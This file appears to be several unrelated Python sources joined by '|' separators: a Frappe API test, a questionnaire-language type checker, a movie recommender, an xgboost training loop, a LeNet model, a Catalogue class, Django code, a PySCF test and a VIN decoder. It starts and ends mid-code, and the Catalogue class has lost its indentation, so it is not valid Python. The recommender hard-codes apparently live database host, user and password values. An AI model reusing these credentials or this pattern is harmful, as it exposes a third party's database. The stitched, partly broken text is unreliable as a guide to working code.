		from frappe.auth import CookieManager, LoginManager

		frappe.utils.set_request(path="/")
		frappe.local.cookie_manager = CookieManager()
		frappe.local.login_manager = LoginManager()
		frappe.local.login_manager.login_as('Administrator')
		params = {
			'doctype': 'DocType',
			'fields': ['name', 'modified'],
			'sid': frappe.session.sid,
		}
		headers = {
			'accept': 'application/json',
			'content-type': 'application/json',
		}
		url = f'http://{frappe.local.site}:{frappe.conf.webserver_port}/api/method/frappe.client.get_list'
		res = requests.post(
			url,
			json=params,
			headers=headers
		)
		self.assertEqual(res.status_code, 200)
		data = res.json()
		first_item = data['message'][0]
		self.assertTrue('name' in first_item)
		self.assertTrue('modified' in first_item)
		frappe.local.login_manager.logout()
|
# -*- coding: utf-8 -*-
"""
This module contains the logic of the QL checker. The QL checker looks for and
reports errors in the AST tree. This module concreteley detects:
- Duplicated declarations.
- Duplicated labels.
- Invalid assignations.
- Invalid conditions.
- Invalid operands.
- Cyclic dependencies.
- Undefined dependencies.
"""
from ql.ast.type import Boolean
from ql.ast.type import Undefined
class QLChecker(object):
    """Walks the QL AST, registers every declared node and reports the
    errors and warnings described in the module docstring to the checker."""

    def __init__(self, ast, checker):
        """Initialises QL Checker and registers every node of the AST."""
        super().__init__()
        self.ast = ast
        self.checker = checker
        self.dependencies = {}  # variable name -> names its expressions use
        self.register = {}      # variable name -> declaring node
        self.types = {}         # variable name -> declared type
        for node in ast.nodes:
            self.__register_node(node)

    def check(self):
        """
        This function iterates through all the declared nodes in the AST and
        checks for possible errors in them. In case any error is found, it is
        reported to the checker.
        """
        for node in self.ast.nodes:
            self.__check_cyclic_dependencies(node)
            self.__check_invalid_assignation(node)
            self.__check_invalid_conditions(node)
            self.__check_invalid_operands(node)
            self.__check_undefined_dependencies(node)

    def get_type(self, key):
        """
        Returns the type of the node.
        """
        try:
            return self.types[key]
        except KeyError:
            # If this exception is triggered, it means that the variable
            # itself that we are querying is an undefined variable. This
            # error has been already reported with the function
            # __check_undefined_id
            return Undefined()

    def register_error(self, node, message):
        """Registers an error in the typechecker."""
        self.checker.add_error(node, message)

    def register_warning(self, node, message):
        """Registers a warning in the typechecker."""
        self.checker.add_warning(node, message)

    def __register_node(self, node):
        """
        Adds a node to the QL checker. It will also check for certain errors
        detected on declaration time like duplicated questions and labels
        (warning) and will report them to the typechecker which will process
        them.
        """
        # Checks if the declaration of the node will produce an error.
        self.__check_duplicate_labels(node)
        self.__check_duplicate_declarations(node)
        # Add the type of the node to the dictionary.
        self.types[node.variable.name] = node.variable.type
        # Tracks the dependencies of the node.
        dependencies = []
        if node.expression:
            expr = node.expression
            dependencies += expr.depends_on()
        for condition in node.conditions:
            dependencies += condition.depends_on()
        self.dependencies[node.variable.name] = dependencies
        # Adds the node to a register with all the declared nodes.
        # NOTE(review): this unconditional assignment overwrites the entry
        # set by __check_duplicate_declarations, contradicting its stated
        # design of keeping the existing node on duplicates -- confirm intent.
        self.register[node.variable.name] = node

    ###
    # Checks on registration of the node.
    ###

    def __check_duplicate_labels(self, node):
        """
        Looks for duplicated labels before adding it. If anyone is found,
        it will raise a warning in the typechecker.
        """
        labels = [item.text for key, item in self.register.items()]
        if (node.text in labels):
            msg = 'Duplicated field label {}'
            self.register_warning(node, msg.format(node.text))

    def __check_duplicate_declarations(self, node):
        """
        Duplicate question declarations with different types.
        The project description says that it should only detect duplicated
        questions if they have different types. However, it makes more sense
        detect any duplicate variable. Therefore, we do both.
        """
        variable_name = node.variable.name
        if variable_name in self.register:
            msg = 'Duplicated question detected. It was {}'
            existing_node = self.register[variable_name]
            if (existing_node.variable.type != node.variable.type):
                msg = 'Duplicated question with different type. It was {}'
            self.register_error(node, msg.format(existing_node))
        else:
            # Here we take the design decision of keeping the existing one and
            # ignoring the new one.
            self.register[variable_name] = node

    ####
    # Checks after registration of all the node.
    ####

    def __check_invalid_conditions(self, node):
        """
        This function checks for errors in the expressions. Concretely, it
        checks for expressions used in conditionals that do not return a
        boolean.
        """
        # Looks for invalid conditionals.
        for condition in node.conditions:
            if condition.get_type(self) != Boolean():
                msg = ('The expression {} in the condition does not return a '
                       'boolean')
                self.register_error(node, msg.format(condition))

    def __check_invalid_assignation(self, node):
        """
        This function checks for errors in the expressions. It checks for
        expressions used in assignations that return a different type than the
        expected by the variable.
        """
        key = node.variable.name
        if node.expression:
            # BUG FIX: expressions resolve their type against the checker
            # instance (see condition.get_type(self) above and
            # child.get_type(self) below); passing the variable-name string
            # here broke the type lookup.
            expr_type = node.expression.get_type(self)
            node_type = self.get_type(key)
            if node_type != expr_type:
                msg = 'The assignation expected a {} but got a {}'
                self.register_error(node, msg.format(node_type, expr_type))

    def __check_invalid_operands(self, node):
        """
        This function checks for errors in the expressions. It checks for
        operations with operands that are not supported, like adding strings.
        """
        queue = []
        if node.expression:
            queue += [node.expression]
        queue += node.conditions
        # Looks for operations with invalid operands.
        # Order does not matter as all the expressions will be evaluated.
        while queue:
            expr = queue.pop()
            children = expr.get_children()
            try:
                operation = expr.operation
                for child in children:
                    if (operation not in
                            child.get_type(self).allowed_operations()):
                        msg = ('The child {} does not allow to perform the '
                               '{} operation')
                        self.register_error(node, msg.format(child, operation))
                    queue.append(child)
            except AttributeError:
                # It is a Leaf node, nothing to worry about. Even if this looks
                # wrong, this is the pythonic way of doing it. It was this or
                # giving the LeafNodes a operation attribute, which does not
                # make sense.
                pass

    def __check_undefined_dependencies(self, node):
        """
        Detects the errors in the dependencies of a node. It checks for
        Undefined dependencies: Variables referenced in a expressions which are
        not defined by any node.
        """
        for dependency in self.dependencies[node.variable.name]:
            if dependency not in self.dependencies:
                msg = 'The node depends on a undefined variable "{}"'
                self.register_error(node, msg.format(dependency))

    def __check_cyclic_dependencies(self, node):
        """
        Detects the errors in the dependencies of a node. It checks for nodes
        which dependencies depend on them, also known as cyclic dependencies.
        For this, we calculate the extended dependencies of a node to not only
        check the dependencies of the node but also the dependencies of the
        dependencies.
        """
        key = node.variable.name
        for dependency in self.dependencies[key]:
            # For every dependency of a key, we need to check the
            # dependency and the ones that it has.
            all_dependencies = self.__get_extended_dependencies(dependency)
            if key in all_dependencies:
                dependency_node = self.register[dependency]
                msg = 'The node {} has a cyclic dependency with {}'
                self.register_error(node, msg.format(node,
                                                     dependency_node))

    def __get_extended_dependencies(self, key):
        """
        Extracts the unique dependencies of a key and the dependencies of the
        dependencies.
        """
        all_dependencies = []
        queue = []
        if key in self.dependencies:
            all_dependencies += self.dependencies[key]
            queue += self.dependencies[key]
        # Breadth-unbounded traversal; already-seen names are not re-queued.
        while queue:
            dependency = queue.pop()
            if dependency in self.dependencies:
                dependency_dependencies = self.dependencies[dependency]
                all_dependencies += dependency_dependencies
                for dependency_dependency in dependency_dependencies:
                    if dependency_dependency not in all_dependencies:
                        queue.append(dependency_dependency)
        return all_dependencies
|
#!pip install pymysql
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy import insert
import pymysql
import mysql.connector as msql
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
def predictPlot():
    """Recompute plot-based movie recommendations for the most recent user.

    Reads the latest (user, movie) pair from user_history, builds a TF-IDF
    matrix over all movie plots, ranks movies by cosine similarity to the
    watched movie, and writes the top two ids into user_predictions.
    """
    #Start MySQL connection
    # SECURITY NOTE(review): database credentials are hard-coded in source
    # (here and below); move them to environment variables or a config file.
    db_connection_str = 'mysql+pymysql://sql4399167:VMAJwNlAix@sql4.freesqldatabase.com/sql4399167'
    db_connection = create_engine(db_connection_str)
    #Query userid, movieid for prediction
    history = pd.read_sql('select user_id,movie_id from user_history order by date_time desc limit 1', con=db_connection)
    user=history['user_id'].iloc[0]
    premovie=history['movie_id'].iloc[0]
    #Query necessary columns for first suggestion system
    plot_df = pd.read_sql('select movie_id,title,plot from movies', con=db_connection)
    # NOTE: result unused -- notebook residue.
    plot_df['plot'].head(3)
    #Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'
    tfidf = TfidfVectorizer(stop_words='english')
    #Replace NaN with an empty string
    plot_df['plot'] = plot_df['plot'].fillna('')
    #Construct the required TF-IDF matrix by fitting and transforming the data
    tfidf_matrix = tfidf.fit_transform(plot_df['plot'])
    #Output the shape of tfidf_matrix
    # NOTE: result unused -- notebook residue.
    tfidf_matrix.shape
    #Array mapping from feature integer indices to feature name.
    # NOTE(review): get_feature_names() was removed in scikit-learn >= 1.2
    # (use get_feature_names_out()); the result is unused anyway.
    tfidf.get_feature_names()[5:15]
    # Compute the cosine similarity matrix
    # linear_kernel == cosine similarity here because TF-IDF rows are
    # L2-normalised.
    cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)
    # NOTE: the next two expressions are unused -- notebook residue.
    cosine_sim.shape
    cosine_sim[1]
    #Construct a reverse map of indices and movie titles
    indices = pd.Series(plot_df.index, index=plot_df['movie_id']).drop_duplicates()
    # NOTE: result unused -- notebook residue.
    indices[:10]

    # Function that takes in movie title as input and outputs most similar movies
    def get_recommendations(title, cosine_sim=cosine_sim):
        # Get the index of the movie that matches the title
        idx = indices[title]
        # Get the pairwsie similarity scores of all movies with that movie
        sim_scores = list(enumerate(cosine_sim[idx]))
        # Sort the movies based on the similarity scores
        sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
        # Get the scores of the 10 most similar movies
        # (index 0 is the movie itself, so start at 1)
        sim_scores = sim_scores[1:11]
        # Get the movie indices
        movie_indices = [i[0] for i in sim_scores]
        # Return the top 10 most similar movies
        return plot_df['movie_id'].iloc[movie_indices]

    sug_movie2 = get_recommendations(premovie)
    # NOTE: result unused -- notebook residue.
    sug_movie2.head()
    #Update user_predictions
    mydb = msql.connect(
        host="sql4.freesqldatabase.com",
        user="sql4399167",
        password="VMAJwNlAix",
        database="sql4399167"
    )
    mycursor = mydb.cursor()
    smovieid1 = sug_movie2.iloc[0]
    smovieid2 = sug_movie2.iloc[1]
    # Parameterized update (placeholders, not string formatting).
    sql = "UPDATE user_predictions SET sg_movie_id_2 = %s, sg_movie_id_3 = %s WHERE user_id = %s"
    val = (str(smovieid1),str(smovieid2),str(user))
    mycursor.execute(sql,val)
    mydb.commit()
    print("Recommendations updated for user ",user)


#predictPlot()
|
class PlayerStatus:
    """Wrapper around a Hypixel ``status`` API response.

    Exposes the player's UUID and the raw session block; equality and
    hashing are based on the UUID alone.
    """

    def __init__(self, data: dict) -> None:
        """
        Parameters
        ----------
        data: dict
            The JSON data received from the Hypixel API.
        """
        # UUID identifies the player; SESSION_INFO holds the raw session
        # block (e.g. the "online" flag used by __repr__).
        self.UUID = data["uuid"]
        self.SESSION_INFO = data["session"]

    def __str__(self) -> str:
        return self.UUID

    def __repr__(self) -> str:
        return f'<{self.__class__.__name__} uuid="{self.UUID}" online="{self.SESSION_INFO["online"]}">'

    def __hash__(self) -> int:
        return hash(self.UUID)

    def __eq__(self, other: object) -> bool:
        # Robustness fix: comparing against a non-PlayerStatus used to raise
        # AttributeError; returning NotImplemented lets Python fall back to
        # the other operand / identity semantics instead.
        if not isinstance(other, PlayerStatus):
            return NotImplemented
        return self.UUID == other.UUID
|
/anaconda3/lib/python3.7/codecs.py |
import xgboost as xgb
import numpy as np
import pandas

major_list = []
training_csv = pandas.read_csv('./train.csv', index_col=0)
testing_csv = pandas.read_csv('./test_2.csv', index_col=0)

# The feature matrices and the test DMatrix do not depend on the target
# column, so build them once instead of re-deriving them in every one of
# the 62 loop iterations (columns 146..209 are the target/weight columns).
training_data = training_csv.drop(training_csv.columns[range(146, 210)], axis=1).values
testing_data = testing_csv.values
data_test = xgb.DMatrix(testing_data, missing=np.nan)

for Number in range(1, 62 + 1):  # From 1 to 62
    # Targets 61/62 are the daily returns; 1..60 map to the intraday
    # returns Ret_121..Ret_180, each with its matching sample weight.
    if Number == 61:
        name_of_column = 'Ret_PlusOne'
        name_of_weight = 'Weight_Daily'
    elif Number == 62:
        name_of_column = 'Ret_PlusTwo'
        name_of_weight = 'Weight_Daily'
    else:
        name_of_column = 'Ret_' + str(Number + 120)
        name_of_weight = 'Weight_Intraday'
    train_targets = training_csv[name_of_column].values
    train_weights = training_csv[name_of_weight].values
    # np.nan replaces np.NaN, which was removed in NumPy 2.0.
    data_train = xgb.DMatrix(training_data, label=train_targets, missing=np.nan, weight=train_weights)
    # NOTE(review): 'silent' is deprecated in newer xgboost releases --
    # switch to 'verbosity' when upgrading.
    model_parameters = {'max_depth': 10, 'eta': 0.1, 'silent': 1, 'gamma': 0, 'lambda': 500, 'alpha': 400}
    number_of_rounds = 500
    # Early stopping monitors the training set itself (no held-out eval).
    watchlist = [(data_train, 'train')]
    bst = xgb.train(model_parameters, data_train, number_of_rounds, watchlist, early_stopping_rounds=10)
    predictions = bst.predict(data_test)
    # Submission ids are "<row>_<target>" (rows are 1-based).
    for ID, P in enumerate(predictions):
        major_list.append({'Id': str(ID + 1) + '_' + str(Number), 'Predicted': P})

output = pandas.DataFrame(data=major_list)
output.sort_values(by='Id', inplace=True)
print(output.head())
output.to_csv(path_or_buf="./output.csv", index=False)
|
'''LeNet in PyTorch.
Modified based on (https://github.com/kuangliu/pytorch-cifar/blob/master/models/lenet.py)
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class LeNet(nn.Module):
    """LeNet variant where stride-2 convolutions replace the max-pool stages."""

    def __init__(self):
        super(LeNet, self).__init__()
        # Stride-2 convs downsample in place of the classic pooling layers.
        self.conv1 = nn.Conv2d(3, 6, 5, stride=2, bias=False)
        self.conv2 = nn.Conv2d(6, 16, 5, stride=2, bias=False)
        # For a 32x32 input: conv1 -> 14x14, conv2 -> 5x5, hence 16*5*5
        # features entering the classifier head.
        self.fc1 = nn.Linear(16 * 5 * 5, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, 10)

    def forward(self, x):
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        # Flatten all but the batch dimension.
        x = torch.flatten(x, 1)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        return self.fc3(x)
|
from collections import OrderedDict as dict
import pandas as pd
import numpy as np
__all__ = ['CatalogueGroup',
'Catalogue']
class CatalogueGroup(object):
    """Ordered, callback-aware mapping used by the Catalogue class.

    Stores related items (a "group") and notifies an optional callback
    whenever an item is added, removed or modified, so the owning
    catalogue can keep its derived state in sync.

    The callback must have the signature ``callback(name, key, option)``
    where ``name`` is this group's name, ``key`` the affected item and
    ``option`` one of ADDED, REMOVED or MODIFIED.
    """

    # Event codes reported to the callback.
    ADDED = 0
    REMOVED = 1
    MODIFIED = 2

    @property
    def items(self):
        """The underlying mapping of stored items."""
        return self._items

    @property
    def name(self):
        """Name identifying this group."""
        return self._name

    def __init__(self, name, callback=None):
        """Create an empty group with the given name and change callback."""
        self._name = name
        self._items = dict()
        self._callback = callback

    def _notify(self, key, option):
        """Forward a change event to the callback, if one was supplied."""
        if self._callback is None:
            return
        self._callback(self._name, key, option)

    def __setitem__(self, key, value):
        """Store *value* under *key* and report ADDED or MODIFIED."""
        option = CatalogueGroup.MODIFIED if key in self._items else CatalogueGroup.ADDED
        self._items[key] = value
        self._notify(key, option)

    def __delitem__(self, key):
        """Remove *key* and report REMOVED."""
        del self._items[key]
        self._notify(key, CatalogueGroup.REMOVED)

    def __getitem__(self, key):
        """Return the item stored under *key*."""
        return self._items[key]

    def __contains__(self, key):
        """Return whether *key* is stored in this group."""
        return key in self._items

    def __iter__(self):
        """Yield the stored keys in insertion order."""
        return iter(self._items)

    def __str__(self):
        """Human-readable listing of the stored items."""
        lines = []
        for index, item in enumerate(self._items):
            lines.append(" item {} <{}> : {} \n".format(index, item, str(self._items[item])))
        return "".join(lines)
class Catalogue(object):
""" Catalogue Class
This class will be used to store different types of data and
bind them. The class will manage different groups or dictionaries
depending on the types to be stored.
Catalogue works as a database. For this particular reason it will need
columns and indexes in order to works properly. In the constructor
we have to pass he index name of the group that will be used to
indexing the data.
ej. You have three groups: Entity, Component_type2 and Component_type2.
(The same catalog should be shared between the three groups)
The index will be "Entity", this means we can bind and Entity with a
component_typeXX. Then we can use the pandas dataframe to pick
the elements you need.
>> #Get the dataframe form the catalogue
>> df = Catalogue.dataframe
>> # Get the current entity-components
>> entity_component = df.loc[:,component_types].dropna(axis=0)
>> print(df.head())
Component_type1 Component_type2
entity02 NaN NaN
entity03 Transform03 NaN
entity05 NaN NaN
The index is given in the contructor of the class, where index is
the name of a group (existing) in the catalogue.
However this Class could be used for any other pourpose
like managing resources, references or any map-reduce
systems that requires a Hastable to store some data
and make relation between data
Basically, Catalogue will store:
- Entities created (depending on the type)
- Components created (depensding on the type)
- Systems created ( depending on the type)
- Mapping between entities, components and Systems
The maping between each data will be performed by
calling the link function of catalogue. This is to
link entities and components.
To show the data stored, with the catalogue and bindings,
you can use two ways.
# Create the main Catalogue
catalogue = Catalogue(index = catalogue_index)
print(catalogue)
print(repr(catalogue.head()))
or
print(catalogue.dataframe.head(10))
Basic example
# Test
catalogue_index = "Entity"
catalogue_col1 = "Transform"
catalogue_col2 = "Position"
catalogue_col3 = "Health"
catalogue_col4 = "Renderable"
entities = ["entity01", "entity02", "entity03", "entity04","entity05"]
components = [catalogue_col1, catalogue_col2, catalogue_col3,catalogue_col4]
entity01_comp = ["Transform01", None , None , "Renderable01" ]
entity02_comp = ["Transform02", None , "Health02" , "Renderable02" ]
entity03_comp = ["Transform03", "Position03", None , None ]
entity04_comp = ["Transform04", "Position04", "Health04" , None ]
entity05_comp = ["Transform05", None , "Health05" , "Renderable05" ]
entities_comp = [entity01_comp, entity02_comp, entity03_comp, entity04_comp, entity05_comp ]
# Create the main Catalogue
catalogue = Catalogue(index = catalogue_index)
# Add all the entities into the catalogue
for index, entity in enumerate(entities):
# Add current entity
catalogue[catalogue_index][entity] = entity
# Add component for the current entity
for cindex, ctype in enumerate(components):
comp_instance = entities_comp[index][cindex]
if comp_instance is not None:
# Add current component to the catalogue
catalogue[ctype][comp_instance] = comp_instance
# Bind the current comp with it's entity
catalogue.bind(entity, ctype, comp_instance)
print(catalogue)
print(catalogue.dataframe.head(10))
Output:
GROUP Entity:
item 0 <entity01> : entity01
item 1 <entity02> : entity02
item 2 <entity03> : entity03
item 3 <entity04> : entity04
item 4 <entity05> : entity05
GROUP Transform:
item 0 <Transform01> : Transform01
item 1 <Transform02> : Transform02
...
item 1 <Health04> : Health04
item 2 <Health05> : Health05
GROUP Position:
item 0 <Position03> : Position03
item 1 <Position04> : Position04
Dataframe:
Transform Renderable Health Position
entity01 Transform01 Renderable01 NaN NaN
entity02 Transform02 Renderable02 Health02 NaN
entity03 Transform03 NaN NaN Position03
entity04 Transform04 NaN Health04 Position04
entity05 Transform05 Renderable05 Health05 NaN
# Delete and index entity
del catalogue[catalogue_index]["entity01"]
del catalogue[catalogue_index]["entity04"]
print(catalogue.dataframe.head(10))
# Delete components
del catalogue[catalogue_col1]["Transform02"]
del catalogue[catalogue_col4]["Renderable05"]
del catalogue[catalogue_col2]["Position04"]
Transform Renderable Health Position
entity02 NaN NaN NaN NaN
entity03 Transform03 NaN NaN Position03
entity05 NaN NaN NaN NaN
"""
@property
def dataframe(self):
    """Read-only view of the pandas DataFrame mapping entities (rows) to components (columns)."""
    return self._dataframe
@property
def index(self):
    """Key of the group whose items become the dataframe's rows (the entity group)."""
    return self._index

@index.setter
def index(self, value):
    # No validation is performed; callers must pass a valid group key.
    self._index = value
def __init__(self, index):
    """Initialize variables and objects.

    index -- key of the group whose items become the dataframe rows.
    """
    # Create a catalogue with all the entities and components
    self._groups = dict()   # group key -> lazily created CatalogueGroup
    self._items = dict()    # flat lookup: item -> stored value, across all groups
    self._index = index
    # Create the dataframe that maps each entity to its components
    self._dataframe = pd.DataFrame()
def __setitem__(self, key, value):
    """Catalogue doesn't allow creating groups manually.

    Assignment is deliberately a no-op; groups are created lazily by
    __getitem__ instead.
    """
    pass
def __getitem__(self, key):
    """Retrieve the group with the given key.

    Groups are created lazily on first access and wired to
    _callback_group so the catalogue is notified of item changes.
    """
    # Check if the group has already been created.
    if key not in self._groups:
        self._groups[key] = CatalogueGroup(key, self._callback_group)
    return self._groups[key]
def __contains__(self, key):
    """Return whether `key` names an existing group (not an item)."""
    return key in self._groups
def __iter__(self):
"""Retrieve the items elements using loops statements.
This usually are more efficent in terms of memory
"""
for group in self._groups:
yield group
def __getattr__(self, key):
""" If not in attrbites the search on pandas dataframe
"""
if key in self.__dict__:
return getattr(self, key)
else:
return getattr(self._dataframe, key)
def __str__(self):
""" Build the default function to represent the catalogue
user friendly
"""
result = ""
for key, value in self._groups.items():
result += "GROUP {}:\n".format(key)
result += str(self._groups[key])
return result
def __repr__(self):
""" Perpare the catalogue to be represented as object to
be saved and loaded later on.
"""
pass
def _item_added(self, key, item):
    """Handle an item added to group `key`: mirror it in the flat item map."""
    # Add the new item into the catalogue-wide lookup
    self._items[item] = self[key][item]
def _item_removed(self, key, item):
    """Handle an item removed from a group.

    Removing an entity should drop its dataframe row; removing a
    component clears its cell via unbind. Either way the item leaves
    the flat lookup.
    """
    # NOTE(review): this tests `key` (the group name) against the
    # dataframe index, but the index holds entity names and `item` is
    # what gets dropped — confirm whether the membership test should
    # be `item in self._dataframe.index`.
    if key == self._index and key in self._dataframe.index:
        # Remove the current row
        self._dataframe.drop(item, inplace=True)
    else:
        # Remove the element from the current column
        self.unbind(key, item, None)
    # Remove the item from the full list
    del self._items[item]
def _item_modified(self, key, item):
    """Handle an in-place item update: refresh the flat lookup entry."""
    # Replace the item
    self._items[item] = self[key][item]
def _callback_group(self, key, item, option):
    """Notification hook invoked by a CatalogueGroup on change.

    Routes the ADDED / REMOVED / (anything else = modified) event to
    the matching private handler.
    """
    if option == CatalogueGroup.ADDED:
        handler = self._item_added
    elif option == CatalogueGroup.REMOVED:
        handler = self._item_removed
    else:
        handler = self._item_modified
    handler(key, item)
def get(self, item):
    """Return the stored value for `item`, searching across all groups.

    Raises KeyError if the item is unknown.
    """
    return self._items[item]
def bind(self, index, column, item):
    """Map `item` into the dataframe cell (index row, column).

    index  -- row key (entity name)
    column -- column key (component group)
    item   -- value stored in the cell
    """
    # Bind the current index, col using dataframe
    if self._dataframe.empty:
        # First binding: create the frame with a single cell so both
        # axes exist.
        self._dataframe = pd.DataFrame([item], index = [index], columns=[column])
    else:
        # .loc assignment enlarges the frame, creating any missing
        # row/column and filling other cells with NaN.
        self._dataframe.loc[index,column] = item
def unbind(self, index, column, item):
""" This function will unbind the current key from the catalogue.
"""
if column in self._dataframe.columns and index in self._dataframe.index:
# Remove the element from the curren col
self._dataframe.loc[index,column] = np.NaN
|
from django.db import models
from django.conf import settings
class Suspicious(models.Model):
    """Per-user record of suspicious login activity.

    One row per user; `attempt` presumably gets incremented by the
    caller on each new event (starts at 1) — confirm against the view
    that writes it. `first_attempt` is set once, `last_attempt` is
    refreshed on every save.
    """
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='suspicious', verbose_name=('user')
    )
    # Number of suspicious attempts recorded so far.
    attempt = models.PositiveSmallIntegerField(default=1, verbose_name=('attempt'))
    first_attempt = models.DateTimeField(auto_now_add=True, verbose_name=('first attempt'))
    last_attempt = models.DateTimeField(auto_now=True, verbose_name=('last attempt'))
    # Free-form strings; blank/null allowed because they are not always
    # obtainable from the request.
    ip = models.CharField(max_length=150, verbose_name='ip address', blank=True, null=True)
    mac = models.CharField(max_length=150, verbose_name='mac address', blank=True, null=True)

    def __str__(self):
        return self.user.username

    class Meta:
        verbose_name = ("Suspicious User")
        verbose_name_plural = ("Suspicious Users")
        # Most recent activity first.
        ordering = ["-last_attempt"]
|
from django.apps import AppConfig
class SearchPageConfig(AppConfig):
    """Django AppConfig for the search_page application."""
    name = 'search_page'
|
#!/usr/bin/env python
# Copyright 2021 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from pyscf import lib
from pyscf import gto
from pyscf import scf
from pyscf.mcscf import avas
class KnownValues(unittest.TestCase):
    """Regression tests pinning known AVAS active-space results."""

    def test_avas(self):
        # Open-shell (spin=2) H-O-O-H geometry in a small basis;
        # output is discarded so verbose=7 doesn't pollute the test log.
        mol = gto.M(
            atom = '''
H  0.000000,  0.500000,  1.5
O  0.000000,  0.000000,  1.
O  0.000000,  0.000000, -1.
H  0.000000, -0.500000, -1.5''',
            basis = '6-31g',
            spin = 2,
            verbose = 7,
            output = '/dev/null'
        )
        mf = scf.RHF(mol).run()
        # Default openshell_option.
        ncas, nelecas, mo = avas.kernel(mf, 'O 2p')
        self.assertAlmostEqual(abs(mo).sum(), 106.25385500717569, 6)
        self.assertAlmostEqual(lib.fp(abs(mo)), 2.0834371806990823, 7)
        # openshell_option=3 treats singly-occupied orbitals differently.
        ncas, nelecas, mo = avas.kernel(mf, 'O 2p', openshell_option=3)
        self.assertAlmostEqual(abs(mo).sum(), 106.59750085040332, 6)
        self.assertAlmostEqual(lib.fp(abs(mo)), 1.886278150191051, 7)
        # UHF reference path.
        ncas, nelecas, mo = avas.kernel(mf.to_uhf(), 'O 2p')
        self.assertAlmostEqual(abs(mo).sum(), 106.11798294361598, 6)
        self.assertAlmostEqual(lib.fp(abs(mo)), 2.0950187018846607, 7)
        mol.stdout.close()
if __name__ == "__main__":
    # Run this module's tests directly.
    print("Full Tests for mcscf.avas")
    unittest.main()
|
from os import close
from django.http import HttpResponse
from django.template import Template, Context
from django.template import loader
import datetime
def saludo(request):
    """Return a plain greeting (smoke-test view)."""
    return HttpResponse("Hola Django - Coder")
def segundaView(request):
    """Return a short self-introduction page."""
    return HttpResponse("Soy Lautaro Murua este es mi sitio web desarrollado en Django")
def diaDeHoy(request):
    """Show the current date and time as a tiny HTML fragment."""
    dia = datetime.datetime.now()
    return HttpResponse(f"Hoy es dia: <br> {dia}")
def apellido(request, ape):
    """Greet using the last name captured from the URL pattern."""
    return HttpResponse(f"El mejor programador se llama {ape}!!")
def probandoTemplate(request):
    """Render template1.html with a small hard-coded context."""
    contexto = {
        "nombre": "Lautaro Murua",
        "lenguaje": "Python",
        "frameworks": ["flask", "Pyramid", "Django", "Web2py"],
    }
    plantilla = loader.get_template("template1.html")
    return HttpResponse(plantilla.render(contexto))
#!/usr/bin/env python
# coding: utf-8
# In[105]:
import pandas as pd
import numpy as np
import pickle
import streamlit as st
def AshokLeyland(x):
    """Decode the build year and month from an Ashok Leyland VIN.

    x[9] carries the year code, x[11] the month code. Returns
    [year, month] as strings; raises KeyError on unknown codes.
    """
    # VIN code letters in cyclic order (I, O, Q, U, Z are never used).
    alphabet = list("ABCDEFGHJKLMNPRSTVWXY")
    months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
              "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
    # Year codes start at 'B' == 2011 and follow the alphabet.
    year_by_code = {alphabet[i + 1]: str(2011 + i) for i in range(20)}
    year = year_by_code[x[9]]
    # The lookup table only covers 2011-2028 (18 rows); later year
    # letters fail with KeyError, exactly like the old DataFrame .loc.
    row = int(year) - 2011
    if row >= 18:
        raise KeyError(year)
    # Each month column is the alphabet shifted back by the month
    # number, so the cell at (row, m) is alphabet[(row - m) % 21].
    month_by_code = {alphabet[(row - m) % 21]: months[m] for m in range(12)}
    return [year, month_by_code[x[11]]]
def TataMotors(x):
    """Decode the build year and month from a Tata Motors VIN.

    x[9] carries the year code, x[11] the month code. Returns
    [year, month] as strings; raises KeyError on unknown codes.
    """
    month_dict = {"A":"Jan",
                  "B":"Feb",
                  "C":"Mar",
                  "D":"Apr",
                  "E":"May",
                  "F":"Jun",
                  "G":"Jul",
                  "H":"Aug",
                  "J":"Sep",
                  "K":"Oct",
                  "N":"Nov",
                  "P":"Dec"}
    # Year codes start at 'B' == 2011; digits extend the range to 2034.
    year_codes = "BCDEFGHJKLMNPRSTVWXY1234"
    year_dict = {code: str(2011 + i) for i, code in enumerate(year_codes)}
    return [year_dict[x[9]], month_dict[x[11]]]
def Validate(x):
    """Classify a chassis/VIN string and decode its year and month.

    Returns {"Manufacturer", "Year", "Month"} for recognised prefixes
    ('MAT' -> Tata Motors, 'MB' -> Ashok Leyland), otherwise the error
    string "Chassis no is not valid".
    """
    x = x.replace(" ", "").upper()
    y = ""
    try:
        if x[0:3] == 'MAT' and len(x) >= 15 and len(x) <= 17:
            res = TataMotors(x)
            y = {"Manufacturer": "Tata Motors", "Year": res[0], "Month": res[1]}
        elif x[0:2] == 'MB' and len(x) >= 15 and len(x) <= 17:
            res = AshokLeyland(x)
            y = {"Manufacturer": "Ashok Leyland", "Year": res[0], "Month": res[1]}
        else:
            y = "Chassis no is not valid"
    except Exception:
        # Narrowed from a bare `except:` which also swallowed
        # SystemExit/KeyboardInterrupt. Decoding failures (unknown code
        # letter, truncated VIN, ...) land here.
        y = "Chassis no is not valid"
    return y
#x = "MAT491125FJC0189"
#x = "MB1AA22E9FRD95267"
#Validate(x)
def main():
    """Streamlit front end: read a VIN and show the decoded result."""
    # here we define some of the front end elements of the web page like
    # the font and background color, the padding and the text to be displayed
    # NOTE(review): the closing </div> below has no matching opening tag —
    # browsers tolerate it, but confirm it isn't a leftover.
    html_temp = """
    <h1 style ="color:black;text-align:center;">Chassis Number Decoder </h1>
    </div>
    """
    # this line allows us to display the front end aspects we have
    # defined in the above code
    st.markdown(html_temp, unsafe_allow_html = True)
    # the following lines create text boxes in which the user can enter
    # the data required to make the prediction
